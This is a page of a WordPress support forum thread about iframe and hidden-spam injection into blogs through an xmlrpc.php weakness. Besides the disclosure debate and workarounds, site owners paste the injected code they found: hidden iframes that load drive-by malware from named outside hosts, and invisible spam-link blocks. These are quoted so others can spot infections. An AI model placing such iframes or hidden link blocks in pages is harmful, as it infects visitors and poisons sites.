It seems what I did up there wasn't the right thing to do. Cat's out of the bag now, but next time I'll go through the right process. Really sorry for the inconenience.
iframe injection problem? (92 posts)
-
duskglow
Posted 1 year ago # -
heres a quick fix:
[bad fix removed]
-
I agree, sorta. Here is where I dont.
These attacks have been going on for weeks, if not months. HAD you waited, how many more blogs WordPress blogs would have been exploited while they "got on top of of it".
Now theres a fix. Now, when someone says "hey, this happened", we, you and I, and everyone else that reads the forums knows what to say happened and can explain how to fix it.
Frankly, they, and I mean no disrespect to any developers of WP, have had ample time to "get on top" of something that has been going on for months.
You, in my opinion, did the right thing, by shining a light on a big ass black hole that bothered a lot of us now for quite some time. Excellent catch..
--
Did it go unnoticed that this thread started THREE months ago?
-
Posted 1 year ago #Well, I'm not completely convinced this is the only one. The person who hacked my page managed to do so in such a way that it stayed published.
But thanks for the support.
-
I saw your comment. :) yeah we tested it, on the SVN as well - both resulted in edited posts that were changed to drafts.
I was actually wondering how many threads I could dig up on here where ppl complained about logging in and finding that their previously published posts had somehow reverted to draft status, and how far back that went.
A cursory look at xmlrpc.php indicates that in 2.0.x there WAS and IS user checking. In 2.1.x it *appears* to have changed to the way it currently sits, unless there was user checking elsewhere.
-
Posted 1 year ago #Well, if they do it again, I'm logging up the wazoo right now. Hopefully I'll figure it out. :)
-
Posted 1 year ago #I'm actually thinking that there are two different exploits, but I haven't found the other. I think that this is the exploit they used to actually change the content of the post, and I think there is another that they used to set it to "publish".
That's why I think there were two separate xmlrpc calls.
This whole codebase could use a serious audit.
-
whoami, your fix does not. I would rather not have people think they're safe and really not be, and there is a release coming shortly anyway. If you'd like to post more to this thread please reply to the email I sent you this morning.
If anyone is scared and wants a fix NOW, they should either turn off registration (which is off by default) or delete xmlrpc.php.
-
Posted 1 year ago #Matt, thanks for your attention to this, and again I'm sorry if I caused more trouble than necessary. I'm not sure I would do it too differently if done all over again, but I think I would give you guys a couple of days to get a patch out.
-
Otto42 was correct a month ago that any information should be sent to our security address, that way a real fix can be put out before you inform every bad guy on the planet about the problem, even if one already has it. This is what security professionals do, too, because they know it causes far greater harm than not to.
-
Posted 1 year ago #Perhaps. But I would respond that in addition to my other reasonings, it was 4:30 AM, I was kind of gobsmacked that I even found the d*mn thing in the first place (I'm a very experienced coder/system administrator, etc., but I've never ever found a bug of this scale before), and I had no idea the "security" address even existed. I kinda lost my head.
I think it's a learning experience for both sides, and we'll leave it at that. After all, while I may have handled this in a suboptimal manner, it did take four months for it to be found - and then by someone who had nothing to do with coding wordpress and had honestly never really looked at the code before. So let's just chalk it up to experience. I apologize for the trouble. Deal?
-
The security address was mentioned a few posts before yours, but okay.
-
Posted 1 year ago #Matt, I didn't see it. If I had have, I would have known what to do. That's my bad, especially if it were staring right at me like that, but what's done is done.
-
bentrem
Posted 1 year ago #Wait a minute ... if we're talking about security then we're talking about something like strict logic. (Someone mentioned "audit"? I'm available ... I won't tell you what I wrote for optimizing VB5 shiet. As for normalizing a commodity trading shop's QuatroPro and Paradox? $250/day 14 years ago. And I did MEL-SPEC FMECA at fed rates. You wanna wade into that swamp, get yourself a good boat. Or skis.)
I don't see anything here like fault-isolation and identification. /Not saying it's not; saying don't see./
Here's the noisy bit I found in VillageIdiots' thread:
"they managed to edit mine in place and leave it published."
Well ok: if that's so, then we've got A.
But if it's "the posts end up being changed to drafts" (That'd be nice!) then we've got B.So: if we reporter could re-iterate again, for once more time, reduntantly, that's verified as a UserCase.
When someone maps out how to disconfirm that, they should publish IEEE.Point is: it's distinct scenarios; either they're left in / toggled to Draft (1 chain) or they remain Publish (1 chain ... a different one).
The facts merely collapse the probability wave and provide a link back to the failure node, they don't fix the fault.*I'm not much into coaxing a worm to squirm or a cat to stray ... call me old-fashion.*
--bentrem
-
Posted 1 year ago #There were two separate xmlrpc calls. I suspect we have B that turns into A. Just because it was set to published doesn't mean this is an invalid scenario, it just means there is a component to it that has not yet been identified.
(someone DID register to my site before this happend)
Your style is very poetic and very difficult to understand.
-
Posted 1 year ago #@duskglow Yes, you're right, it's true. But not always. ;-)
1) concensus seems to be "left in Draft"; you wrote "managed to do so in such a way that it stayed published" ... have there been others reports of "left as Published"? did the test scenario you blogged leave things as Published?
2) do you think it's two separate scenarios?
In TRAC the call seems to be for more hard data.
-
keithwp
Posted 1 year ago #@duskglow: excellent work isolating the problem and identifying an instant workaround/fix.
Glad to see that the problem was found and the wordpress folks have released a patch.
I'm sure a couple people here are happy to find out that they really weren't crazy after all. :)
Thanks
-
So, if we upgraded to 2.3.2, this is no longer an issue?
-
fluxinull
Posted 1 year ago #Version 2.3.3 and I'm still getting spam injection.
<font style="position: absolute;overflow: hidden;height: 0;width: 0">
absorption disposition and elimination of alcohol 1 g zithromax activities for alcohol and drug classes
etc..etc..etc..
</font>This was mentioned in this thread previously but it seems to have been overlooked. This seems very similar to the iframe injection. It shows up in a post after it's been published, no modify or edit noticed.
-
mrkook
Posted 1 year ago #I'm getting code injected into posts on one of my blogs as well, and I just upgraded to 2.3.3 to try and prevent this and it happened again
Same as Fluxinul:
<font style="position: absolute;overflow: hidden;height: 0;width: 0"><!--4848--><a href="
100s of spam links
</font>How do I lock this down?
-
Posted 1 year ago #I found at least part of our problem, it appears that the wordpress db user didn't have alter privileges on the db. So the db upgrade to 2.3.2 and then 2.3.3 from a very old version, didn't work completely. It didn't fail completely either which is something that should be fixed.
We have done a force db upgrade and things are acting fairly normal now, we'll see how the spam injection goes.
-
usabih
Posted 1 year ago #I wrote more about it how to fix this all:
http://www.bontb.com/2008/03/wp-content1-trojan-virus-for-wordpress-bloggers/I have 2.3.3 and problem is i started seeing logs from sql since march 11th !
now my suggestion also is to remove all users from wp-register if u don't need them...
-
daleyboy50
Posted 1 year ago #having the same sort of problem. i have this which seems like it is implanted in all files.. bummer
<IFRAME src="http://www.dms-clan.de/vwar/upload/index.html"
width="0" height="0" frameborder="0"></iframe>
<IFRAME src="http://www.dms-clan.de/vwar/upload/index.html"
width="0" height="0" frameborder="0"></iframe>plus google has sent this message to me..
We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.com.any ideas anyone on where this is coming from i haven't got a blog only a guestbook?
-
Galeth
Posted 1 year ago # -
allonline
Posted 1 year ago #Got this one on one of two of my ver 2.3.3 blogs the wp-settings.php file was infected with an iframe injection to some stat.php page. I deleted the code on both sites and upgraded one to 2.5. Now this weekend i find the other blog infected again with the code below.
#iframe src='http://mystabcounter.info/index2.php' width='6' height='6' style='visibility: hidden;'></iframe#
( i have replaced the brackets with #)Googling this site suggests it launches drive by malware type trojans.
This time though it was in every wp file in the root of the blog. I downloaded everything including plugins and themes and scanned with a search/replace program to search only for the offending code and only found it in the root files. I have now deleted all wordpress files and upgraded to ver 2.5 on that one. I have other blogs on ver 2.3.3 on same server that seem ok but i will gradually change them over to 2.5 as well.I notified my host who are looking into it but cant be sure if it was just wordpress as i have basic plugins and no much else that i have used for years, the only change was first 2.3.3 over Xmas on all blogs.
I notified it by checking my feed links on the blog, the injection breaks the feed so and displays the iframe code on the screen (if you use Firefox to view) so i would advise everyone to click around there blog and especially the feed to see if anything looks wrong, also just download your entire website and scan the files with a search/replace program set to search only for iframe code, i used Handytools searchreplace as its nice and simple and easy to just point it at a folder and let it run searching subfolders as well.
Regards
Rob
-
DraxOfAvalon
Posted 1 year ago #I have WP 2.5 and no "strange" plugins and got the same injection today... looks like this
<!-- Traffic Statistics --> <iframe src=http://xx.xxx.8.157/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->and of course it downloads a trojan... my AV told me... still no fix for this? -
UncleSam
Posted 1 year ago #I read that the best solution is to temporarily remove xmlprc.php from host - I did this.
Will there be a fix to the problem or it will go into the version 2.6 or whatever you call it?
-
pishmishy
Posted 1 year ago #If the problem exists, no one has been able to replicate it or provide logs or other evidence that might give a hint as to the cause.
DraxOfAvalon: did you catch your blog being exploited in your logs? Was your blog a fresh 2.5 install or an upgrade to 2.5 from a previous version?
-
stoned
Posted 1 year ago #Alright here is some more information from my end in hopes that it can help things..
I had an issue in the past with the iframe injection into a couple of my blogs (back then I had only about 8), I removed the code and upgraded to the newest version of wordpress. Unfortunately I only documented the code and not the actual sites that it was found on. This was probably 4-6 months ago and since had not had any issues until last week.
Most of my blogs hold position within google for terms that get me sales on a daily basis. At the beginning of last week I noticed a drop in sales, and upon searching on google noticed a link underneath my blog saying "This site may harm your computer". Upon looking further into it I realized that someone had once again injected code into my posts.
I removed it, upgraded to 2.5, asked google to reanalyze my site, and about 5 days later the link was removed and I was back to business (or so I thought). During this time frame, I upgraded my 170+ wordpress blogs to 2.5 (a MAJOR pain in the butt), and scanned posts on the others to make sure the code had not been injected. After the countless amount of hours spent, I assumed I had solved the issue. Well the past two days I noticed a decrease in my main money making blog, and upon checking google I saw the damn "This site may harm your computer" link again, this time on a new site which had never had it before.
I am positive the code was not there last week when I upgraded to 2.5, and was injected since. Searching around on google I cannot seem to find much information on how to resolve the issue, which is how I happened upon this page. When potential customers click my site, it takes them to a google page warning them, so I essentially lose ALL of my sales during the down time. I am pissed to say the least.
When I went through the sites checking posts and upgrading to 2.5 I notated the ones which had been injected, and going through them the only plugin that they share would be "Google XML Sitemaps by Arne Brachhold". Could this be the issue? That I have the sitemap files set to CHMOD 666?
So, the blogs which were injected, were upgraded to 2.5 from a previous version of wordpress. I will have to start the time consuming process of manually checking the posts on all 170+ blogs again to see if any others are compromised.
This is costing me a ridiculous amount of money, I would appreciate any input on how I can secure these blogs and resolve the issue, which is why I provided so much. I will check back often so if you have any questions regarding my situation I will happily answer them.
-
Posted 1 year ago #It should also be noted that I do allow both user registrations and comments on these blogs, but require moderation for comments. Had not seen anything fishy when approving comments. Should I turn off user registrations?
« Previous 1 2 3 4 Next »
Topic Closed
This topic has been closed to new replies.
